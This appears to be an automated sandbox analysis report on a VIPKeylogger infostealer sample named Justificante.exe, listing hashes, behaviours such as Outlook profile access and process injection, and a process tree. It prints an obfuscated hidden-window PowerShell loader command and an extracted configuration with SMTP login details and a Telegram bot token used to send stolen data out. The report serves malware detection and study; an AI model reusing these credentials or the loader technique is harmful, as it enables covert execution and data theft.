Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25/10/2024, 14:22
Static task
static1
Behavioral task
behavioral1
Sample
Justificante.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Justificante.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Jobation.ps1
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Jobation.ps1
Resource
win10v2004-20241007-en
General
-
Target
Justificante.exe
-
Size
661KB
-
MD5
8a9c90ba02c22e957bff42c02e6a4189
-
SHA1
4fe3080dbf75f99fa64dbf4e35f08560d4b2ef0c
-
SHA256
8e8286667afb0526fcc2959ef670d63dd0503b8b0914daa7e0905fa77d356628
-
SHA512
de296476d773f0d61feb647376ee9f2131463bafb18243adcfd8ccd2e6b958ebf90294d24e09a1ef526ff8b25d8d6d291217766514d6cdd9f60afc8ed417bb50
-
SSDEEP
12288:vc5+AfopdAeHHn7XpjIW0ep9Rr2M/iTGYqWofv1zSFXMhuV+7+bY:vZAaAeHHlECyCiuW095ugcY
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.turktav.com - Port:
587 - Username:
[email protected] - Password:
)d!s~MV@X;!M - Email To:
[email protected]
https://api.telegram.org/bot7422104780:AAE8Q_pLcHk4fu5XIMEQar6JqYuE_1O_qCg/sendMessage?chat_id=7451270736
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 220 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 31 744 msiexec.exe 33 744 msiexec.exe 35 744 msiexec.exe 37 744 msiexec.exe 41 744 msiexec.exe 44 744 msiexec.exe 46 744 msiexec.exe 59 744 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 drive.google.com 31 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 43 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 744 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 220 powershell.exe 744 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Gallinipper\gid.ful Justificante.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\storewide.Riv Justificante.exe File opened for modification C:\Windows\resources\0409\thermels\dekaterendes.ini Justificante.exe File opened for modification C:\Windows\Fonts\choanosome\nitrosyl.ini Justificante.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Justificante.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 744 msiexec.exe 744 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 744 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 220 powershell.exe Token: SeIncreaseQuotaPrivilege 220 powershell.exe Token: SeSecurityPrivilege 220 powershell.exe Token: SeTakeOwnershipPrivilege 220 powershell.exe Token: SeLoadDriverPrivilege 220 powershell.exe Token: SeSystemProfilePrivilege 220 powershell.exe Token: SeSystemtimePrivilege 220 powershell.exe Token: SeProfSingleProcessPrivilege 220 powershell.exe Token: SeIncBasePriorityPrivilege 220 powershell.exe Token: SeCreatePagefilePrivilege 220 powershell.exe Token: SeBackupPrivilege 220 powershell.exe Token: SeRestorePrivilege 220 powershell.exe Token: SeShutdownPrivilege 220 powershell.exe Token: SeDebugPrivilege 220 powershell.exe Token: SeSystemEnvironmentPrivilege 220 powershell.exe Token: SeRemoteShutdownPrivilege 220 powershell.exe Token: SeUndockPrivilege 220 powershell.exe Token: SeManageVolumePrivilege 220 powershell.exe Token: 33 220 powershell.exe Token: 34 220 powershell.exe Token: 35 220 powershell.exe Token: 36 220 powershell.exe Token: SeDebugPrivilege 744 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 744 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3736 wrote to memory of 220 3736 Justificante.exe 85 PID 3736 wrote to memory of 220 3736 Justificante.exe 85 PID 3736 wrote to memory of 220 3736 Justificante.exe 85 PID 220 wrote to memory of 744 220 powershell.exe 98 PID 220 wrote to memory of 744 220 powershell.exe 98 PID 220 wrote to memory of 744 220 powershell.exe 98 PID 220 wrote to memory of 744 220 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Justificante.exe"C:\Users\Admin\AppData\Local\Temp\Justificante.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Frustreringers=Get-Content -raw 'C:\Users\Admin\AppData\Local\Mixende\Klausuleringerne\Jobation.udk';$Brndes=$Frustreringers.SubString(53183,3);.$Brndes($Frustreringers)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:744
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
223KB
MD5ea6867f02c973c162bce9569b3e62a32
SHA1702f1e9bea0be45c56f8d7fa1b838cb6aedd30a1
SHA25603132d30bbf7bd4b58663587fc045f2e36cc0723b91ed9e5c6eaf6d9a4591012
SHA5129bb95a906e29b0d957c239d800c0263144c3468e73edc48c0285136501ae39b15a04ab7b4623eb9639a118573dd63e161759fd9f5a7518062ee4beca78107d0e
-
Filesize
51KB
MD5faace62892757e3f6b6bcdc07c3b75e0
SHA11b0bcaaaf1c6b3aeaee3a7eef36f0a1776fb654b
SHA2566492bacab0fd62ad56b0c444c325f727653725a87fc221e2bb6baf8d56490f89
SHA51212f0d38ee61532c33c3618525163ed79bb5e51d21cb0d3e35db98b1b4e1cbb42b3569682b2cdd869592c8649e6e83a49e777704980bb207d9790692e59682bbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82